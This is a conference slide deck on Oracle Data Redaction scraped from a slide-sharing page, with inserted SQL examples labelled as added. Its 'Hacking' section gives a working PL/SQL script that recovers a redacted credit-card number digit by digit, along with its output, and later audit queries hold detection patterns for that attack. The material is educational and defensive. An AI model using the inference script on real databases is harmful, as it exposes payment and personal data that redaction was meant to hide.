UKOUG Technology Conference & Exhibition 2014 
8th – 10th December, ACC Liverpool 
Follow: @UKOUG
Oracle Data Redaction 
Presented by: 
Alex Zaballa, Oracle Solution Architect, Jupiter 
Daniel Da Meda, Oracle DBA, Jupiter
Alex Zaballa 
http://alexzaballa.blogspot.com/ 
@alexzaballa
Daniel Da Meda 
•18 years of experience using Oracle technologies 
•7 years working as a Senior DBA in the UK for a variety of companies such as 
TimeWarner, Johnson & Johnson, Network Rail and John Deere 
•Moved to Angola over 2 years ago, where I continue to work as a Senior DBA 
providing services for the Ministry of Finance 
•Photography enthusiast 
http://thatoracledude.blogspot.com/ 
@ddameda 
daniel.da.meda@hotmail.com 
http://www.guoa.org/
contacto@jupiter.co.ao 
Ministry of Finance
Oracle Data Redaction 
Data Redaction 
• One of the new features introduced in 
Oracle Database 12c 
• Part of the Advanced Security option 
• Enables the protection of data shown to 
the user in real time, without requiring 
changes to the application
• Applies protection at query execution time 
• The stored data remain unchanged 
Redaction takes place immediately preceding the return of selected 
data and only at the top level of a SELECT list 
• It is not an operation shown in the execution plan 
Policy 
SELECT rep.object_name as "OBJECT", 
rep.policy_name, 
rep.expression, 
rep.enable, 
rec.column_name as "COLUMN", 
rec.function_type 
FROM redaction_policies rep, 
redaction_columns rec 
WHERE rep.object_owner = rec.object_owner 
AND rep.object_name = rec.object_name; 
OBJECT POLICY_NAME EXPRESSION ENABLE COLUMN FUNCTION_TYPE 
------ ----------- ------------------------------------------------ ------ ------ -------------- 
EMP SCOTT_EMP SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY FULL REDACTION
SQL> EXPLAIN PLAN FOR SELECT * FROM EMP; 
SQL> SELECT * FROM table(DBMS_XPLAN.DISPLAY(format=>'ALL')); 
As SCOTT with the MGR role: 
-------------------------------------------------------------------------- 
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | 
-------------------------------------------------------------------------- 
| 0 | SELECT STATEMENT | | 3 | 36 | 3 (0)| 00:00:01 | 
| 1 | TABLE ACCESS FULL| EMP | 3 | 36 | 3 (0)| 00:00:01 | 
-------------------------------------------------------------------------- 
As SCOTT without the MGR role: 
-------------------------------------------------------------------------- 
| Id | Operation | Name | Rows | Bytes | Cost (%CPU)| Time | 
-------------------------------------------------------------------------- 
| 0 | SELECT STATEMENT | | 3 | 36 | 3 (0)| 00:00:01 | 
| 1 | TABLE ACCESS FULL| EMP | 3 | 36 | 3 (0)| 00:00:01 | 
--------------------------------------------------------------------------
Not to be confused with 
Oracle Data Masking 
With Oracle Data Masking, the data is 
processed using masked shapes and this 
updated data is stored in new data blocks. 
For this reason, Data Masking is more 
suitable for non-production environments. 
** Oracle Data Masking is available only with Enterprise Edition 
database and it requires licensing of Advanced Security. 
Below are some other features that already 
existed to help make the data more secure: 
•Virtual Private Database (VPD) - Allows access control 
at both row and column level by dynamically adding a 
predicate to SQL statements issued against the database. 
•Oracle Label Security - Allows you to add user-defined 
values to table records, combining them with VPD to allow fine 
control of who sees what. 
•Database Vault - Data Redaction does not prevent 
privileged users (such as DBAs) from having access to the 
data being protected. To solve this, you can make use of 
Database Vault. 
Planning on Oracle Data Redaction Policy 
1. Ensure that you have been granted the EXECUTE privilege on 
the DBMS_REDACT PL/SQL package. 
2. Determine the data type of the table or view column that you want to 
redact. 
3. Ensure that this column is not used in an Oracle Virtual Private 
Database (VPD) row filtering condition. That is, it must not be part of 
the VPD predicate generated by the VPD policy function. 
4. Decide on the type of redaction that you want to perform: full, 
random, partial, regular expressions, or none. 
5. Decide which users to apply the Data Redaction policy to. 
6. Based on this information, create the Data Redaction policy by using 
the DBMS_REDACT.ADD_POLICY procedure. 
7. Configure the policy to redact additional columns if needed.
Conditional Redaction Examples 
•User Environment 
expression => 'SYS_CONTEXT(''USERENV'',''SESSION_USER'') = ''PSMITH''' 
•Database Role 
expression => 'SYS_CONTEXT(''SYS_SESSION_ROLES'',''SUPERVISOR'') = ''FALSE''' 
•Oracle Label Security Label Dominance 
expression => 'OLS_LABEL_DOMINATES (''hr_ols_pol'',''hs'') = 0' 
•Application Express Session States 
expression => 'V(''APP_USER'') != ''mavis@example.com'' or V(''APP_USER'') is null' 
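The planning steps and the conditional expressions above, put together as one complete policy definition. This is an added example, not code from the slides: it assumes a SCOTT.EMP table with NUMBER columns SALARY and COMM and a database role named MGR, matching the SCOTT_EMP policy shown in the earlier REDACTION_POLICIES output, and it is run by a user who holds EXECUTE on DBMS_REDACT.

```sql
-- Added example (not from the slides). Assumes SCOTT.EMP with columns SALARY
-- and COMM (both NUMBER) and a database role MGR.

-- Step 1: the user defining the policy needs EXECUTE on DBMS_REDACT (run as a DBA).
GRANT EXECUTE ON DBMS_REDACT TO scott;

-- Step 3: confirm the column is not part of a VPD predicate on this table.
-- Any row here means the VPD policy function must be reviewed first.
SELECT policy_name, pf_owner, package, function
FROM   dba_policies
WHERE  object_owner = 'SCOTT' AND object_name = 'EMP';

-- Steps 4-6: full redaction of SALARY for every session in which the MGR
-- role is not enabled. Step 5 ("which users") lives entirely in the expression.
BEGIN
  DBMS_REDACT.ADD_POLICY(
    object_schema => 'SCOTT',
    object_name   => 'EMP',
    policy_name   => 'SCOTT_EMP',
    column_name   => 'SALARY',
    function_type => DBMS_REDACT.FULL,
    expression    => 'SYS_CONTEXT(''SYS_SESSION_ROLES'',''MGR'') = ''FALSE''');

  -- Step 7: add a second column to the same policy. A policy has one
  -- expression, so COMM is redacted under exactly the same condition.
  DBMS_REDACT.ALTER_POLICY(
    object_schema => 'SCOTT',
    object_name   => 'EMP',
    policy_name   => 'SCOTT_EMP',
    action        => DBMS_REDACT.ADD_COLUMN,
    column_name   => 'COMM',
    function_type => DBMS_REDACT.FULL);
END;
/

-- Check the result: one policy row joined to two column rows
-- (SALARY and COMM, both FULL REDACTION, ENABLE = YES).
SELECT rep.policy_name, rep.expression, rep.enable,
       rec.column_name, rec.function_type
FROM   redaction_policies rep
JOIN   redaction_columns  rec
       ON  rec.object_owner = rep.object_owner
       AND rec.object_name  = rep.object_name
WHERE  rep.object_owner = 'SCOTT' AND rep.object_name = 'EMP';
```

Any of the other conditional expressions listed above (SESSION_USER, OLS_LABEL_DOMINATES, the APEX V('APP_USER') check) can be substituted for the expression parameter unchanged; note the doubled single quotes, since the expression is passed as a string literal that the database evaluates at query execution time.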
DBMS_REDACT 
• DBMS_REDACT.ALTER_POLICY 
Allows changes to existing policies. 
• DBMS_REDACT.DISABLE_POLICY 
Disables an existing policy. 
• DBMS_REDACT.DROP_POLICY 
Drops an existing policy. 
• DBMS_REDACT.ENABLE_POLICY 
Enables an existing policy. 
• DBMS_REDACT.UPDATE_FULL_REDACTION_VALUES 
Change the default return value for full redaction. 
You must restart the database to take effect.
Redaction Methods 
• Full redaction 
• Partial redaction 
• Regular expressions 
• Random redaction 
• No redaction
FULL Data Redaction 
•Character Data Types 
The output text is a single space 
•Number Data Types 
The output text is a zero 
•Date-Time Data Types 
The output text is set to the first day of January, 2001
RANDOM Data Redaction 
•CHAR Data Types 
Redacted in the same character set and byte length as the column 
definition 
•Number Data Types 
Redacted in the same character set; the length is limited by 
the length of the actual data 
•Date-Time Data Types 
Redacted as random dates that are always different from those 
of the actual data
Column data types 
NUMBER, BINARY_FLOAT, 
BINARY_DOUBLE, CHAR, VARCHAR2, 
NCHAR, NVARCHAR2, DATE, 
TIMESTAMP, TIMESTAMP WITH TIME 
ZONE, BLOB, CLOB, and NCLOB
Operational Activities - No Redaction 
•Backup and Restore 
•Import and Export 
•Patching and Upgrades 
•Replication 
•Users SYS and SYSTEM automatically have 
the EXEMPT REDACTION POLICY system 
privilege 
•Data Redaction is not enforced for users 
connected as SYSDBA 
Data Redaction and Data Pump 
ORA-28081: Insufficient privileges - the command 
references a redacted object 
Use the EXEMPT REDACTION POLICY system privilege 
in these cases. However, use it with caution. 
Note that the role DATAPUMP_EXP_FULL_DATABASE 
includes the EXEMPT REDACTION POLICY system 
privilege.
Data Redaction and CTAS 
In order to perform a CREATE TABLE AS SELECT 
operation from a table protected by an active redaction 
policy, the user must have privileges to see the actual 
data on the source table. 
Because applications may need to perform CREATE 
TABLE AS SELECT operations that involve redacted 
source columns, you can grant the application the 
EXEMPT DDL REDACTION POLICY system privilege. 
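Both the Data Pump and the CTAS slides come down to the same control question: who holds EXEMPT REDACTION POLICY or EXEMPT DDL REDACTION POLICY, directly or through a role such as DATAPUMP_EXP_FULL_DATABASE? The script below is an added example, not from the slides; it uses only the standard DBA_* dictionary views and is meant to be run as a DBA. The REVOKE at the end uses a placeholder grantee.

```sql
-- Added example (not from the slides): inventory of users who can read past
-- redaction. Run as a DBA.

-- 1. Direct grants of either exemption privilege to a user account.
SELECT s.grantee, s.privilege, 'DIRECT' AS granted_via
FROM   dba_sys_privs s
JOIN   dba_users u ON u.username = s.grantee
WHERE  s.privilege IN ('EXEMPT REDACTION POLICY', 'EXEMPT DDL REDACTION POLICY')
ORDER  BY s.grantee, s.privilege;

-- 2. Grants inherited through roles. Start at every role that holds one of
--    the privileges (DATAPUMP_EXP_FULL_DATABASE is the usual one) and walk
--    nested role grants outward until a user account is reached.
SELECT r.grantee                                          AS user_name,
       CONNECT_BY_ROOT r.granted_role                     AS exempt_role,
       SYS_CONNECT_BY_PATH(r.granted_role, ' > ') || ' > ' || r.grantee AS grant_path
FROM   dba_role_privs r
WHERE  r.grantee IN (SELECT username FROM dba_users)
START WITH r.granted_role IN (
         SELECT grantee
         FROM   dba_sys_privs
         WHERE  privilege IN ('EXEMPT REDACTION POLICY',
                              'EXEMPT DDL REDACTION POLICY'))
CONNECT BY PRIOR r.grantee = r.granted_role
ORDER  BY user_name, exempt_role;

-- 3. Remediation for an account that should not be exempt (placeholder name).
REVOKE EXEMPT REDACTION POLICY FROM some_app_user;
```

SYS and SYSTEM will show up in the first query, which is expected (the slides note they hold the privilege automatically); anything else in either result set is a decision to revisit, because those sessions see the real values regardless of the policy expression. Query 2 does not list accounts that only bypass redaction by connecting AS SYSDBA; that is controlled by the SYSDBA grant itself, not by this privilege.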
Redacted Columns and GROUP BY SQL Expressions 
Redacted columns used in expressions in a GROUP BY clause fail as follows: 
SQL> select * from emp; 
EMP_NO NAME SALARY 
---------- ---------------------------------------- ---------- 
1 Daniel 702 
2 Juca 607 
3 Manuel 314 
SQL> / 
EMP_NO NAME SALARY 
---------- ---------------------------------------- ---------- 
1 Daniel 900 
2 Juca 466 
3 Manuel 220 
SQL> select (salary*1.10) from emp group by (salary*1.10); 
select (salary*1.10) from emp group by (salary*1.10) 
* 
ERROR at line 1: 
ORA-00979: not a GROUP BY expression
Data Redaction and Views 
•Columns from MVIEWS as well as regular VIEWS 
can be redacted 
•Inline views are redacted outermost 
•VPD Inline view with the predicate is not affected 
as it acts on the actual values 
•Redaction policies defined on a VIEW column will 
override the redaction policy defined on the base 
table column. Example on next slide 
SELECT XYZ … AS SELECT A… AS SELECT B… AS 
SELECT C… 
In the above example, SELECT XYZ is redacted first, 
then SELECT A, SELECT B and so on
Data Redaction and Views 
Consider the following Policy on column SALARY of table EMP 
OBJECT EXPRESSION ENABLE COLUMN FUNCTION_TYPE 
--------- -------------------------------------------------- ------ ------------- ---------------- 
EMP SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY RANDOM REDACTION 
A VIEW named EMP_V is created as follows: 
OBJECT EXPRESSION ENABLE COLUMN FUNCTION_TYPE 
--------- -------------------------------------------------- ------ ------------- ---------------- 
EMP_V SYS_CONTEXT('SYS_SESSION_ROLES','MGR') = 'FALSE' YES SALARY NO REDACTION
Data Redaction and Views 
Selecting from the EMP table: 
SQL> select * from emp where name='Daniel'; 
EMP_NO NAME SALARY 
---------- ----------------------- ---------- 
1 Daniel 706 
SQL> select * from emp_v where name='Daniel'; 
EMP_NO NAME SALARY 
---------- ----------------------- ---------- 
1 Daniel 1001
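The override shown on these three slides, as an added example that is not part of the original deck: it recreates the EMP_V scenario (the weak setting) and then runs a dictionary check that finds any view column whose NO REDACTION policy sits on top of a redacted base-table column. It assumes the SCOTT schema with the RANDOM policy on EMP.SALARY already in place, a role named MGR, and that the view keeps the base column names (as SELECT * does); the policy name SCOTT_EMP_V is an assumption.

```sql
-- Added example (not from the slides). Assumes SCOTT.EMP already carries the
-- RANDOM REDACTION policy on SALARY shown above and that the MGR role exists.
CREATE OR REPLACE VIEW scott.emp_v AS SELECT * FROM scott.emp;

-- The weak setting: a NONE policy on the view overrides the RANDOM policy on
-- EMP.SALARY for every query that goes through EMP_V, so non-MGR sessions see
-- the real salary (1001 in the slide) instead of a random one.
BEGIN
  DBMS_REDACT.ADD_POLICY(
    object_schema => 'SCOTT',
    object_name   => 'EMP_V',
    policy_name   => 'SCOTT_EMP_V',
    column_name   => 'SALARY',
    function_type => DBMS_REDACT.NONE,
    expression    => 'SYS_CONTEXT(''SYS_SESSION_ROLES'',''MGR'') = ''FALSE''');
END;
/

-- Dictionary check: view columns with NO REDACTION whose base-table column is
-- redacted. Matches on column name, so it assumes the view does not rename
-- the column.
SELECT v.object_owner,
       v.object_name       AS view_name,
       v.column_name,
       v.function_type     AS view_redaction,
       d.referenced_name   AS base_table,
       b.function_type     AS base_redaction
FROM   redaction_columns v
JOIN   dba_dependencies  d
       ON  d.owner = v.object_owner
       AND d.name  = v.object_name
       AND d.type  = 'VIEW'
       AND d.referenced_type = 'TABLE'
JOIN   redaction_columns b
       ON  b.object_owner = d.referenced_owner
       AND b.object_name  = d.referenced_name
       AND b.column_name  = v.column_name
WHERE  v.function_type = 'NO REDACTION'
AND    b.function_type <> 'NO REDACTION';

-- Fix: remove the view-level policy so the base-table policy applies again
-- (or replace it with a policy at least as strong as the base one).
BEGIN
  DBMS_REDACT.DROP_POLICY(
    object_schema => 'SCOTT',
    object_name   => 'EMP_V',
    policy_name   => 'SCOTT_EMP_V');
END;
/
```

The check returns one row for EMP_V.SALARY (NO REDACTION over RANDOM REDACTION) while the view policy exists and nothing after the DROP_POLICY. Worth running after every release that creates or replaces views over redacted tables, since the override is silent: no error, no execution-plan step, just the real value.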
Overhead 
• It could reach up to 10% of performance impact 
when using complex Regular Expressions 
• Between 2-3% performance impact using other 
redaction methods
Hacking 
•Never to be considered as a way to protect 
data from anyone with SQL access to the 
database 
•Extremely easy to hack once you have access 
to SQL 
•It was never designed to protect data from the 
attack we will demonstrate 
Hacking - Finding Actual Values by Inference 
Let's consider the following Redaction Policy: 
BEGIN 
  DBMS_REDACT.ADD_POLICY( 
    object_schema => 'DDAMEDA', 
    object_name   => 'CUSTOMERS', 
    policy_name   => 'CREDIT_CARD_NO', 
    expression    => 'SYS_CONTEXT(''USERENV'', ''SESSION_USER'') = ''WATCHER'''); 
  DBMS_REDACT.ALTER_POLICY( 
    object_schema          => 'DDAMEDA', 
    object_name            => 'CUSTOMERS', 
    policy_name            => 'CREDIT_CARD_NO', 
    action                 => DBMS_REDACT.ADD_COLUMN, 
    column_name            => '"CREDITCARD_NO"', 
    function_type          => DBMS_REDACT.REGEXP, 
    regexp_pattern         => '.*(\d\d\d\d)$',   -- capture the last four digits 
    regexp_replace_string  => '************\1', -- mask everything else 
    regexp_position        => 1, 
    regexp_occurrence      => 1, 
    regexp_match_parameter => 'i'); 
END; 
/ 
Hacking - Finding Actual Values by Inference 
SQL> SHOW USER 
USER is "WATCHER" 
SQL> SELECT * FROM customers; 
CUSTOMER_ID NAME CREDITCARD_NO 
----------- -------------------- ---------------- 
1 Daniel Da Meda ************4368 
2 Alex Zaballa ************5211 
3 Antonio Mateus ************5005
Hacking - Finding Actual Values by Inference 
SET TIMING ON 
SET SERVEROUTPUT ON 
DECLARE 
  vcreditcard_no CUSTOMERS.creditcard_no%TYPE; 
  vcustomer_name CUSTOMERS.name%TYPE; 
BEGIN 
  FOR a IN 1..19 LOOP 
    IF a NOT IN (5,10,15) THEN 
      FOR b IN 0..9 LOOP 
        BEGIN 
          SELECT name 
            INTO vcustomer_name 
            FROM CUSTOMERS 
           WHERE customer_id = 2 
             AND SUBSTR(creditcard_no, a, 1) = b; 
          vcreditcard_no := vcreditcard_no || b; 
        EXCEPTION 
          WHEN NO_DATA_FOUND THEN 
            NULL; 
        END; 
      END LOOP; 
    ELSE 
      vcreditcard_no := vcreditcard_no || '-'; 
    END IF; 
  END LOOP; 
  DBMS_OUTPUT.PUT_LINE('Credit Card Number for '||vcustomer_name||' is: '||vcreditcard_no); 
END; 
/ 
Hacking - Finding Actual Values by Inference 
vi get_creditcard.sql 
[oracle@12c Desktop]$ sqlplus watcher/icanseeyou@pdbdev 
SQL*Plus: Release 12.1.0.2.0 Production on Wed Nov 5 11:26:53 2014 
Copyright (c) 1982, 2014, Oracle. All rights reserved. 
Connected to: 
Oracle Database 12c Enterprise Edition Release 12.1.0.2.0 - 64bit 
Production 
With the Partitioning, Automatic Storage Management, OLAP, Advanced 
Analytics 
and Real Application Testing options 
SQL> @get_creditcard.sql 
Credit Card Number for Alex Zaballa is: 5102-6342-4881-5211 
PL/SQL procedure successfully completed. 
Elapsed: 00:00:00.03
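The demo above leaves a distinctive footprint: 16 positions times 10 candidate digits is 160 single-row SELECTs against one redacted table in 0.03 seconds, every one of them filtering on SUBSTR of the redacted column. The script below is an added example, not part of the deck, showing how Unified Auditing (available in 12c; mixed mode is enough) records those reads and how to pick the pattern out of UNIFIED_AUDIT_TRAIL. It assumes the DDAMEDA.CUSTOMERS table and the WATCHER account from the demo, is run by a user with the AUDIT_ADMIN role, and the policy name CUSTOMERS_REDACTED_READS is an assumption.

```sql
-- Added example (not from the slides). Assumes Unified Auditing, the
-- DDAMEDA.CUSTOMERS table and the WATCHER user from the demo, and a session
-- holding AUDIT_ADMIN. The policy name is an assumption.

-- Record every SELECT that WATCHER runs against the redacted table.
CREATE AUDIT POLICY customers_redacted_reads
  ACTIONS SELECT ON ddameda.customers;
AUDIT POLICY customers_redacted_reads BY watcher;

-- 1. Volume: per-user, per-minute count of SELECTs on the table. The demo
--    loop produces 160 rows inside a single minute; a real application
--    reading one customer record does not.
SELECT dbusername,
       TRUNC(event_timestamp, 'MI') AS minute,
       COUNT(*)                     AS selects
FROM   unified_audit_trail
WHERE  unified_audit_policies LIKE '%CUSTOMERS_REDACTED_READS%'
AND    action_name = 'SELECT'
GROUP  BY dbusername, TRUNC(event_timestamp, 'MI')
HAVING COUNT(*) > 50
ORDER  BY minute;

-- 2. Shape: predicates that test fragments of the redacted column rather
--    than the customer key. SUBSTR/INSTR on the column, or LIKE against it,
--    have no place in the application's normal SQL for this table.
SELECT dbusername, event_timestamp, sql_text
FROM   unified_audit_trail
WHERE  unified_audit_policies LIKE '%CUSTOMERS_REDACTED_READS%'
AND    (   REGEXP_LIKE(sql_text, '(SUBSTR|INSTR)\s*\(\s*creditcard_no', 'i')
        OR REGEXP_LIKE(sql_text, 'creditcard_no\s+(NOT\s+)?LIKE', 'i'))
ORDER  BY event_timestamp;
```

On 12.1 audit records are queued in memory before being written, so call DBMS_AUDIT_MGMT.FLUSH_UNIFIED_AUDIT_TRAIL first if the most recent rows are missing. Detection is the realistic goal here: as the slide says, redaction was never designed to stop a user who can type SQL, so the controls that actually close this gap are not granting that user SELECT on the table at all, or putting it behind Database Vault.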
About UKOUG 
UKOUG exists to serve the Oracle 
community in the UK and Ireland. We act 
as a focal point for sharing knowledge 
about Oracle applications, technologies, 
tools and developments and, as an 
independent, not for profit membership 
organisation, represent the views of 
users and partners to Oracle. 
© Copyright 2014 UKOUG 
Contact 
User Group House 
591-593 Kingston Road 
Wimbledon 
London 
SW20 8SA 
T: +44 (0)20 8545 9670 
W: www.ukoug.org

Contenu connexe

Tendances

Tony Jambu (obscure) tools of the trade for tuning oracle sq ls
Tony Jambu   (obscure) tools of the trade for tuning oracle sq lsTony Jambu   (obscure) tools of the trade for tuning oracle sq ls
Tony Jambu (obscure) tools of the trade for tuning oracle sq ls
InSync Conference
 
View, Store Procedure & Function and Trigger in MySQL - Thaipt
View, Store Procedure & Function and Trigger in MySQL - ThaiptView, Store Procedure & Function and Trigger in MySQL - Thaipt
View, Store Procedure & Function and Trigger in MySQL - Thaipt
Framgia Vietnam
 
New fordevelopersinsql server2008
New fordevelopersinsql server2008New fordevelopersinsql server2008
New fordevelopersinsql server2008
Aaron Shilo
 
Oracle database performance tuning
Oracle database performance tuningOracle database performance tuning
Oracle database performance tuning
Yogiji Creations
 

Tendances (17)

OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
OOW16 - Oracle Database 12c - The Best Oracle Database 12c New Features for D...
 
Oracle Database 12c Release 2 - New Features On Oracle Database Exadata Expre...
Oracle Database 12c Release 2 - New Features On Oracle Database Exadata Expre...Oracle Database 12c Release 2 - New Features On Oracle Database Exadata Expre...
Oracle Database 12c Release 2 - New Features On Oracle Database Exadata Expre...
 
Less08 Schema
Less08 SchemaLess08 Schema
Less08 Schema
 
Tony Jambu (obscure) tools of the trade for tuning oracle sq ls
Tony Jambu   (obscure) tools of the trade for tuning oracle sq lsTony Jambu   (obscure) tools of the trade for tuning oracle sq ls
Tony Jambu (obscure) tools of the trade for tuning oracle sq ls
 
View, Store Procedure & Function and Trigger in MySQL - Thaipt
View, Store Procedure & Function and Trigger in MySQL - ThaiptView, Store Procedure & Function and Trigger in MySQL - Thaipt
View, Store Procedure & Function and Trigger in MySQL - Thaipt
 
Oracle Data redaction - GUOB - OTN TOUR LA - 2015
Oracle Data redaction - GUOB - OTN TOUR LA - 2015Oracle Data redaction - GUOB - OTN TOUR LA - 2015
Oracle Data redaction - GUOB - OTN TOUR LA - 2015
 
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should KnowDBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
 
Advanced MySQL Query Optimizations
Advanced MySQL Query OptimizationsAdvanced MySQL Query Optimizations
Advanced MySQL Query Optimizations
 
DBA Commands and Concepts That Every Developer Should Know - Part 2
DBA Commands and Concepts That Every Developer Should Know - Part 2DBA Commands and Concepts That Every Developer Should Know - Part 2
DBA Commands and Concepts That Every Developer Should Know - Part 2
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c  - New Features for Developers and DBAsOracle Database 12c  - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
 
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
2° Ciclo Microsoft CRUI 3° Sessione: l'evoluzione delle piattaforme tecnologi...
 
New fordevelopersinsql server2008
New fordevelopersinsql server2008New fordevelopersinsql server2008
New fordevelopersinsql server2008
 
Oracle SQL Tuning
Oracle SQL TuningOracle SQL Tuning
Oracle SQL Tuning
 
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should KnowOTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
OTN TOUR 2016 - DBA Commands and Concepts That Every Developer Should Know
 
Top 10 Oracle SQL tuning tips
Top 10 Oracle SQL tuning tipsTop 10 Oracle SQL tuning tips
Top 10 Oracle SQL tuning tips
 
TSQL in SQL Server 2012
TSQL in SQL Server 2012TSQL in SQL Server 2012
TSQL in SQL Server 2012
 
Oracle database performance tuning
Oracle database performance tuningOracle database performance tuning
Oracle database performance tuning
 

Similaire à Oracle Data Redaction - UKOUG - TECH14

D73549GC10_06.pptx
D73549GC10_06.pptxD73549GC10_06.pptx
D73549GC10_06.pptx
VLQuyNhn
 
(Lab Project) (2)Table of ContentsIntroduction.docx
 (Lab Project) (2)Table of ContentsIntroduction.docx (Lab Project) (2)Table of ContentsIntroduction.docx
(Lab Project) (2)Table of ContentsIntroduction.docx
aryan532920
 
Understanding Query Optimization with ‘regular’ and ‘Exadata’ Oracle
Understanding Query Optimization with ‘regular’ and ‘Exadata’ OracleUnderstanding Query Optimization with ‘regular’ and ‘Exadata’ Oracle
Understanding Query Optimization with ‘regular’ and ‘Exadata’ Oracle
Guatemala User Group
 

Similaire à Oracle Data Redaction - UKOUG - TECH14 (20)

Five_Things_You_Might_Not_Know_About_Oracle_Database_v2.pptx
Five_Things_You_Might_Not_Know_About_Oracle_Database_v2.pptxFive_Things_You_Might_Not_Know_About_Oracle_Database_v2.pptx
Five_Things_You_Might_Not_Know_About_Oracle_Database_v2.pptx
 
D73549GC10_06.pptx
D73549GC10_06.pptxD73549GC10_06.pptx
D73549GC10_06.pptx
 
Presentación Oracle Database Migración consideraciones 10g/11g/12c
Presentación Oracle Database Migración consideraciones 10g/11g/12cPresentación Oracle Database Migración consideraciones 10g/11g/12c
Presentación Oracle Database Migración consideraciones 10g/11g/12c
 
Sql and PL/SQL Best Practices I
Sql and PL/SQL Best Practices ISql and PL/SQL Best Practices I
Sql and PL/SQL Best Practices I
 
Oracle SQL Tuning
Oracle SQL TuningOracle SQL Tuning
Oracle SQL Tuning
 
Performance Stability, Tips and Tricks and Underscores
Performance Stability, Tips and Tricks and UnderscoresPerformance Stability, Tips and Tricks and Underscores
Performance Stability, Tips and Tricks and Underscores
 
Getting Started with MySQL II
Getting Started with MySQL IIGetting Started with MySQL II
Getting Started with MySQL II
 
Oracle Query Optimizer - An Introduction
Oracle Query Optimizer - An IntroductionOracle Query Optimizer - An Introduction
Oracle Query Optimizer - An Introduction
 
2011 Collaborate IOUG Presentation
2011 Collaborate IOUG Presentation2011 Collaborate IOUG Presentation
2011 Collaborate IOUG Presentation
 
Part1 of SQL Tuning Workshop - Understanding the Optimizer
Part1 of SQL Tuning Workshop - Understanding the OptimizerPart1 of SQL Tuning Workshop - Understanding the Optimizer
Part1 of SQL Tuning Workshop - Understanding the Optimizer
 
Best Practices for Oracle Exadata and the Oracle Optimizer
Best Practices for Oracle Exadata and the Oracle OptimizerBest Practices for Oracle Exadata and the Oracle Optimizer
Best Practices for Oracle Exadata and the Oracle Optimizer
 
(Lab Project) (2)Table of ContentsIntroduction.docx
 (Lab Project) (2)Table of ContentsIntroduction.docx (Lab Project) (2)Table of ContentsIntroduction.docx
(Lab Project) (2)Table of ContentsIntroduction.docx
 
DBA Commands and Concepts That Every Developer Should Know - Part 2
DBA Commands and Concepts That Every Developer Should Know - Part 2DBA Commands and Concepts That Every Developer Should Know - Part 2
DBA Commands and Concepts That Every Developer Should Know - Part 2
 
05_DP_300T00A_Optimize.pptx
05_DP_300T00A_Optimize.pptx05_DP_300T00A_Optimize.pptx
05_DP_300T00A_Optimize.pptx
 
Beginners guide to_optimizer
Beginners guide to_optimizerBeginners guide to_optimizer
Beginners guide to_optimizer
 
Understanding Query Optimization with ‘regular’ and ‘Exadata’ Oracle
Understanding Query Optimization with ‘regular’ and ‘Exadata’ OracleUnderstanding Query Optimization with ‘regular’ and ‘Exadata’ Oracle
Understanding Query Optimization with ‘regular’ and ‘Exadata’ Oracle
 
Managing Oracle Streams Using Enterprise Manager Grid Control
Managing Oracle Streams Using Enterprise Manager Grid ControlManaging Oracle Streams Using Enterprise Manager Grid Control
Managing Oracle Streams Using Enterprise Manager Grid Control
 
SQL Tunning
SQL TunningSQL Tunning
SQL Tunning
 
ORACLE CORE DBA ONLINE TRAINING
ORACLE CORE DBA ONLINE TRAININGORACLE CORE DBA ONLINE TRAINING
ORACLE CORE DBA ONLINE TRAINING
 
Oracle core dba online training
Oracle core dba online trainingOracle core dba online training
Oracle core dba online training
 

Plus de Alex Zaballa

Plus de Alex Zaballa (20)

Migrating Oracle Databases from AWS to OCI
Migrating Oracle Databases from AWS to OCIMigrating Oracle Databases from AWS to OCI
Migrating Oracle Databases from AWS to OCI
 
Exploring All options to move your Oracle Databases to the Oracle Cloud
Exploring All options to move your Oracle Databases to the Oracle CloudExploring All options to move your Oracle Databases to the Oracle Cloud
Exploring All options to move your Oracle Databases to the Oracle Cloud
 
Moving Your Oracle Databases To The Oracle Cloud
Moving Your Oracle Databases To The Oracle CloudMoving Your Oracle Databases To The Oracle Cloud
Moving Your Oracle Databases To The Oracle Cloud
 
SQL TUNING 101
SQL TUNING 101SQL TUNING 101
SQL TUNING 101
 
SQL TUNING 101
SQL TUNING 101SQL TUNING 101
SQL TUNING 101
 
DBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should KnowDBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should Know
 
LET’S GET STARTED WITH ORACLE DATABASE CLOUD
LET’S GET STARTED WITH ORACLE DATABASE CLOUDLET’S GET STARTED WITH ORACLE DATABASE CLOUD
LET’S GET STARTED WITH ORACLE DATABASE CLOUD
 
DBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should KnowDBA Commands and Concepts That Every Developer Should Know
DBA Commands and Concepts That Every Developer Should Know
 
Oracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAsOracle Database 12c - New Features for Developers and DBAs
Oracle Database 12c - New Features for Developers and DBAs
 
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should KnowDBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
DBA Brasil 1.0 - DBA Commands and Concepts That Every Developer Should Know
 
Moving your Oracle Databases to the Oracle Cloud
Moving your Oracle Databases to the Oracle CloudMoving your Oracle Databases to the Oracle Cloud
Moving your Oracle Databases to the Oracle Cloud
